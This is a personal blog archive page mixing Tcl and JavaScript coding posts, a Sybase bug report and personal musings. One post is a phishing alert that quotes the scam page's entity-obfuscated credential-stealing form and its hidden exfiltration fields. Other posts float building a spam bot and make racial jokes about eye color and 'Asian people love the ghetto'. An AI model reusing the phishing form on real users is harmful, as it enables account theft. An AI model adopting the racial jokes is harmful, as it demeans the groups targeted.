Normalize ISO-8859-1 to ASCII in Tcl

A co-worker, John, asked me, “How do I normalize ISO-8859-1 encoded text to ASCII in Tcl?” From the command line, you might use GNU recode like this:

$ echo "Mötley Crüe" | recode -f L1..BS | sed -e 's/.\x08//g'
Motley Crue

Fortunately, recode supports dumping a conversion table, but it currently only knows C and Perl. After a little post-processing of the output, I generated this:

set ::ISO_8859_1_to_ASCII [list \
    "" "\001" "\002" "\003" "\004" "\005" "\006" "\007" "\010" "\011" \
    "\012" "\013" "\014" "\015" "\016" "\017" "\020" "\021" "\022" "\023" \
    "\024" "\025" "\026" "\027" "\030" "\031" "\032" "\033" "\034" "\035" \
    "\036" "\037" " " "!" "\"" "#" "\$" "%" "&" "'" "(" ")" "*" "+" "," \
    "-" "." "/" "0" "1" "2" "3" "4" "5" "6" "7" "8" "9" ":" ";" "<" "=" \
    ">" "?" "@" "A" "B" "C" "D" "E" "F" "G" "H" "I" "J" "K" "L" "M" "N" \
    "O" "P" "Q" "R" "S" "T" "U" "V" "W" "X" "Y" "Z" "\[" "\\" "]" "^" "_" \
    "`" "a" "b" "c" "d" "e" "f" "g" "h" "i" "j" "k" "l" "m" "n" "o" "p" \
    "q" "r" "s" "t" "u" "v" "w" "x" "y" "z" "{" "|" "}" "~" "\177" "" \
    "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" "" \
    "" "" "" "" "" "" "" "" " " "" "" "" "" "" "" "" "" "" "" "\"" "" "" \
    "" "" "" "" "" "" "" "" "" "" "" "" "" "\"" "" "" "" "" "A" "A" "A" \
    "A" "A" "" "" "C" "E" "E" "E" "E" "I" "I" "I" "I" "" "N" "O" "O" "O" \
    "O" "O" "" "O" "U" "U" "U" "U" "Y" "" "s" "a" "a" "a" "a" "a" "" "" \
    "c" "e" "e" "e" "e" "i" "i" "i" "i" "" "n" "o" "o" "o" "o" "o" "" "o" \
    "u" "u" "u" "u" "y" "" "y" \
]

proc ISO_8859_1_to_ASCII {in} {
    global ISO_8859_1_to_ASCII
    set out {}
    foreach c [split $in ""] {
        append out [lindex $ISO_8859_1_to_ASCII [scan $c "%c"]]
    }
    return $out
}

With this code, you can use it like this, from within your Tcl script where you’ve sourced this code in:

% ISO_8859_1_to_ASCII "Mötley Crüe"
Motley Crue

I hope this helps others, too.

Tags:
,
,
,
,

Is there any hope for a Silicon Alley?

A couple of months ago, Holly and I were talking about Silicon Valley and wondering if the same phenomenon could be reproduced elsewhere–specifically, in New York, because I really don’t want to leave New Jersey. I really didn’t have many good answers, but a few days ago, Guy Kawasaki gave an excellent answer: How to Kick Silicon Valley’s Butt.

The entire entry is worth reading, but I just wanted to take a quote completely out of context because I still can’t stop smiling when I read it:

“[…] if you want to cover your ass, you need to open your kimono […]”

The depressing part of reading Guy’s blog entry is, if he’s right and I suspect he is, it’s not very likely that there’ll be another “Silicon Valley” elsewhere because the preconditions just aren’t there. Yet.

Tags:
,
,

How to parse “show flow monitor-map” output with Tcl

I’m the organizer of a few Meetups, most successful so far is the MySQL Meetup. However, I also started a Tcl Meetup and today, a new member, Maryam (or “Moryam”) joined and sent me a message asking a Tcl question. I decided to answer it on my blog, so others could see the answer.

Her question is: How can I parse the output of “show flow monitor-map” from Cisco IOS into a “keyed list” (or Tcl array)?

Here is what she sent me as sample input and desired sample output:

RP/0/RP1/CPU0:irace-netflow-r1#show flow monitor-map

Flow Monitor Map : fmm1
-------------------------------------------------
Id: 1
RecordMapName: ipv4-raw
ExportMapName: fem1
CacheAgingMode: Normal
CacheMaxEntries: 65535
CacheActiveTout: 1800 seconds
CacheInactiveTout: 15 seconds
CacheUpdateTout: N/A

flowMonitorMap {
    {identifier fmm1}
    {id 1}
    {recordMapName ipv4-raw}
    {exportMapName fem1}
    {cacheAgingMode Normal}
    { cacheMaxEntries 65535}
    {cacheActiveTout 1800}
    { cacheActiveToutUnit Seconds}
    {cacheInactiveTout 15}
    {cacheInactiveToutUnit Seconds}
    {cacheUpdateTout N/A}
}

I’m going to assume that all the network I/O required (probably using something like Expect to automate that task) has already been implemented. For the sake of the code example, I’m putting the output of the “show flow monitor-map” into the variable $input. The result of the parsing will go into a Tcl array, which is an unordered set of key-value pairs. Here is the code:

##
## Set input data.
##

set input {Flow Monitor Map : fmm1
-------------------------------------------------
Id: 1
RecordMapName: ipv4-raw
ExportMapName: fem1
CacheAgingMode: Normal
CacheMaxEntries: 65535
CacheActiveTout: 1800 seconds
CacheInactiveTout: 15 seconds
CacheUpdateTout: N/A}

##
## Initialize output array
##

array unset output
array set output {}

##
## Parse input data, populate output array.
##

foreach line [split $input "\n"] {
    if {[regexp {^([^:]+?)\s*:\s*(\S+)\s*(\S+)?$} $line -> key value units]} {
        if {$key eq "Flow Monitor Map"} {
            set key "identifier"
        }
        set key [string tolower $key 0 0]
        set output($key) $value
        if {[string length $units]} {
            set output(${key}Unit) $units
        }
    }
}

##
## Optional: Display the output.
##

foreach {key value} [array get output] {
    puts [list $key $value]
}

Running this Tcl script produces this output:

cacheActiveToutUnit seconds
cacheActiveTout 1800
cacheMaxEntries 65535
exportMapName fem1
id 1
recordMapName ipv4-raw
cacheUpdateTout N/A
cacheInactiveToutUnit seconds
cacheInactiveTout 15
cacheAgingMode Normal
identifier fmm1

Remember, Tcl arrays are unordered lists, which is why the key-value pairs printed come back in a different order than they were put in. If you need them ordered, you’ll have to specify the ordering, perhaps like this:

foreach key {identifier id recordMapName exportMapName cacheAgingMode
        cacheMaxEntries cacheActiveTout cacheActiveToutUnit
        cacheInactiveTout cacheInactiveToutUnit
        cacheUpdateTout cacheUpdateToutUnit} {
    if {[info exists output($key)]} {
        puts [list $key $output($key)]
    }
}

This will produce the following output:

identifier fmm1
id 1
recordMapName ipv4-raw
exportMapName fem1
cacheAgingMode Normal
cacheMaxEntries 65535
cacheActiveTout 1800
cacheActiveToutUnit seconds
cacheInactiveTout 15
cacheInactiveToutUnit seconds
cacheUpdateTout N/A

Maryam, I hope this helps answer your question, as well as anyone else who’s looking to accomplish a similar task. Have questions or comments about the code? Leave them in the comments section below!

Tags:
,
,
,
,
,
,

Dossy’s hCard, if you care about microformats

Since Tantek Çelik announced in his blog, Technorati now has a Microformats Search in their Kitchen (beta). Just in case this actually takes off, I figured I’d throw my publically available contact information out in hCard microformat. Here it is:

Nothing really exciting (that’s almost the point) but it’ll be interesting to see where this information will surface, now that it’s more easily machine-readable.

It’ll also be fun exercise to create a web spam bot that creates a bunch of seemingly real but completly fabricated microcontent out there. Without the necessary licensing, Technorati can’t use Google’s patented PageRank process to use links-to-microcontent to determine authoritativeness or relevancy, can it? Just look at the spam blogs now and how it’s ruining blog searches. Spam microcontent won’t be far behind, if microcontent search becomes a reality.

Tags:
(),
,
,
,

Alert: “pupzz2000” phishing attack via Yahoo! Geocities

http://geocities.com/pupzz2000/

This URL is being sent around via IM. It’s a very convincing page that looks like a login for Yahoo! Photos, being circulated by what I suspect is a virus/trojan that uses AIM to propagate as I received this URL via an IM from someone I knew.

Looking at the page’s source (as I was skeptical about having to log into Yahoo! Photos at a geocities.com URL), I found:

<FORM METHOD="POST" ACTION="&#104;&#116;&#116;&#112;://&#119;&#119;&#119;&#050;&#046;&#102;&#105;&#098;&#101;&#114;&#098;&#105;&#116;&#046;&#110;&#101;&#116;/&#102;&#111;&#114;&#109;/&#109;&#097;&#105;&#108;&#116;&#111;&#046;&#099;&#103;&#105;" ENCTYPE="x-www-form-urlencoded">

	<INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
    <INPUT TYPE="hidden" NAME="Mail_To" VALUE="dielameragainlol@googlemail.com">
    <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">

Decoding that form ACTION, it is the following URL:

http://www2.fiberbit.net/form/mailto.cgi

This Geocities page needs to be shut down ASAP before too many people get their Yahoo! accounts compromised. I’ve already sent a message to Yahoo! via it’s abuse web contact form. But, keep on the lookout for this kind of thing.

Tags:
,
,
,

“SELECT DISTINCT … ORDER BY” is broken in Sybase ASE 12.5.3

So, last night I was running into broken behavior in Sybase 12.5.3 with regards to its behavior with SELECT COUNT(DISTINCT columnname) ... which surprised me, but I could at least rationalize why it was happening. Today, I found an outright bug, where mixing SELECT DISTINCT ... with an ORDER BY clause gives the wrong behavior. Here’s a quick session that demonstrates what I’m talking about:

1> SELECT @@version; -m bcp
Adaptive Server Enterprise/12.5.3/EBF 12331 ESD#1/P/Sun_svr4/OS 5.8/ase1253/1900/64-bit/FBO/Tue Jan 25 08:52:58 2005|

1> CREATE TABLE #test (x int, y int);

1> INSERT INTO #test (x, y) VALUES (1, 2);
(1 row affected)
1> INSERT INTO #test (x, y) VALUES (1, 10);
(1 row affected)
1> INSERT INTO #test (x, y) VALUES (2, 1);
(1 row affected)
1> INSERT INTO #test (x, y) VALUES (2, 5);
(1 row affected)
1> INSERT INTO #test (x, y) VALUES (3, 4);
(1 row affected)
1> INSERT INTO #test (x, y) VALUES (3, 7);
(1 row affected)

1> SELECT DISTINCT x FROM #test ORDER BY y DESC;
 x
 -----------
           1
           3
           2
           3
           1
           2

Has this been fixed in a newer version of Sybase? I can’t imagine anyone actually thinks this the right behavior.

Supporting Rob Levin is like supporting the PDPC

Rob Levin, the founder of PDPC (the Peer-Directed Projects Center) blogs about being under attack from Patrick McFarland. You can read Patrick’s side here, where I left a comment. Since I’m concerned that the comment won’t be published, I want to repost it here in my own blog:

If you think raising funds to support Rob Levin through the Spinhome project doesn’t benefit PDPC, Freenode and their benefactors, then you aren’t smart enough to successfully “liberate” the Freenode IRC network and PDPC. Rob has contributed a good portion of his life, has sacrificed much, has been living close to the poverty level supporting a spouse and a young child on the generosity of the community, and has persevered much grief heaped upon him by others who haven’t even accomplished a small fraction of what Rob has already done. Supporting such a person to enable them to continue giving what he already gives selflessly is a win-win for everyone involved.

If you have real, tangible criticisms of PDPC and/or Freenode (or even Rob Levin, himself), I suggest you think them through and express them in an intelligible way. While everyone has their emotional moments, generally adults respond better to reasonable people more than they do to ad hominem attacks.

The way you are currently going about things will accomplish very little.

The sad reality is that any time you provide a service, there will always be customers who you just can’t satisfy. Perhaps Patrick is just one of those people. The fact still remains that Rob is trying to raise funds through his Spinhome project, to help improve his situation so he can continue to focus on improving PDPC and Freenode, which almost 30,000 people benefit from every day. His fundraising goal is in the ballpark of $300K, which might sound high, but just think: if each one of those 30,000 people donated $10, he’d hit his goal. However, since this is a personal project and Rob has very firm convictions about not using PDPC or Freenode for his own personal gain, he won’t even consider directly soliciting support from Freenode’s many users.

Well, as his friend and someone who benefits from his services (the #aolserver IRC chat is hosted on Freenode), I’d like to ask that if you also use Freenode, consider taking the time to make a one-time donation of $8 or $16 to his Spinhome fund. If you know people with open source projects who use Freenode, please pass the word along to them. A small investment from each of us will help ensure that Freenode continues to operate and improve for years to come.

Tags:
,
,
,
,
,
,

Asian people just love the ghetto

Holly, who recently got me a signed copy of Naked Conversations, blogged about a fun little site she’s thrown together with a friend. The name? goghetto.com. The tagline: “Confess your ghetto ways online.”

goghetto.com: Confess your ghetto ways online.

Seems like Asian people just love the ghetto. Terry Chay shares some ghetto photos. Looks like there was much ghetto-loving at Simply Lunch 2.0 according to Mark Jen.

These online confessional sites have always been popular … like group hug and PostSecret … but goghetto.com has more bling. How can you not love that? Especially if you’re Asian!?

UPDATE: goghetto.com is up on Digg — go show your support and Digg it.

Tags:
,
,
,
,

JavaScript optimization, are chained calls expensive?

Sree Kotay blogs about JavaScript a bit. (If you’re interested in more technical details, I’d recommend checking out Simon Willison’s “A (Re)-Introduction to JavaScript” presentation.) In Sree’s blog, he writes:

Part of understanding the distinction, in the trivial case, comes from the (obvious) understanding of basic JS optimization, that:

for (i=0; i<100; i++) a.b.c.d(v);

...is A LOT slower, at least in JavaScript, than:

var f=a.b.c.d;
for (i=0; i<100; i++) f(v);

...because after all, JS is a dynamic language. I'll provide some specific JavaScript performance tips and JavaScript benchmarks to make the points clearly.

Now, I intuitively understand and agree with Sree that the latter should be faster, but exactly how much faster? Are symbol lookups in modern JavaScript engines actually that slow? Don't modern JavaScript interpreters take advantage of JIT bytecode compilation and bytecode optimization, so that if you write the former code, it gets optimized behind the scenes into the latter form? (Whether this is possible through static analysis, I'm not sure of -- I'm just throwing this question out there.)

Supposing it's not possible to optimize away the inefficiency of the first form ... what kind of performance penalty are we talking about? 1%? 10%? Is it a material difference that should drive a best practice around coding convention to avoid it? Out of sheer laziness, I'm only going to benchmark in Firefox 1.5.0.1 here on my 2.2 GHz Dell C840:

<script language="JavaScript">
var v = "Hello, world.";
var a = {
    b: {
        c: {
            d: function(arg) { return arg; }
        }
    }
};

document.write("<p>a.b.c.d(\"Hello, world.\") = " + a.b.c.d("Hello, world.") + "</p>");

var start = new Date();

for (var i = 0; i < 1000000; i++) {
    a.b.c.d(v);
}

var now = new Date();

document.write("<p>Difference: " + (now - start) + "</p>");

start = new Date();

var f = a.b.c.d;
for (var i = 0; i < 1000000; i++) {
    f(v);
}

now = new Date();

document.write("<p>Difference: " + (now - start) + "</p>");
</script>

The output:

a.b.c.d("Hello, world.") = Hello, world.

Difference: 2374

Difference: 1652

Since the JavaScript Date object provides time in milliseconds, we're seeing one million iterations in 2374 milliseconds or 2.4 microseconds per iteration for the first form vs. one million iterations in 1652 milliseconds or 1.7 microseconds for the second form. We're talking a difference of 0.7 microseconds per iteration, or a 29% difference. (Okay, my math skills are really weak, so I could be wrong here. Please double-check my numbers and let me know if I've gotten anything wrong, please.)

Okay, so 29% overhead is nothing to scoff at, but shaving 0.7 microseconds per iteration isn't worth optimizing away when I'm guessing there's lots of other coding practices where much more time is wasted. In other words, 90% of the time spent exeucting a script likely isn't in that 29% of overhead, so it's not where you should be focusing your optimization efforts.

Tags:
,
,

The world’s simplest dating site?

I just love Scott Adams. Recently, he asked, “If you had to design a dating web site that matched people on just two criteria, what would those criteria be?” Call me insensitive, but here’s my answer:

  1. Number of natural teeth.
  2. Eye color.

A complete set of adult teeth should add up to 32 (including the four wisdom teeth). People with more than 32 … well, that’s a big warning flag, right? People with significantly less … probably live too far south or west for me to be interested in all the way up here in New Jersey. So, tooth count is a good selector, if you ask me.

Eye color is the subtle way of being racist. I mean, how many blue-eyed black people do you know? Years ago, I was told a great story where a racially sensitive parent who was told by their child that “they were dating a South African” wanted to subtly find out if they were black or white, so they asked, “what color are his eyes?” Yeah, smooth, right? Of course, most people probably have brown eyes, but for all the people who don’t, this question is probably a good selector.

So, I’m a 29-toothed brown-eyed looking for a 26-32 toothed blue-eyed. (I’ve had two wisdom teeth removed so far, and one is apparently still hiding in my gums.)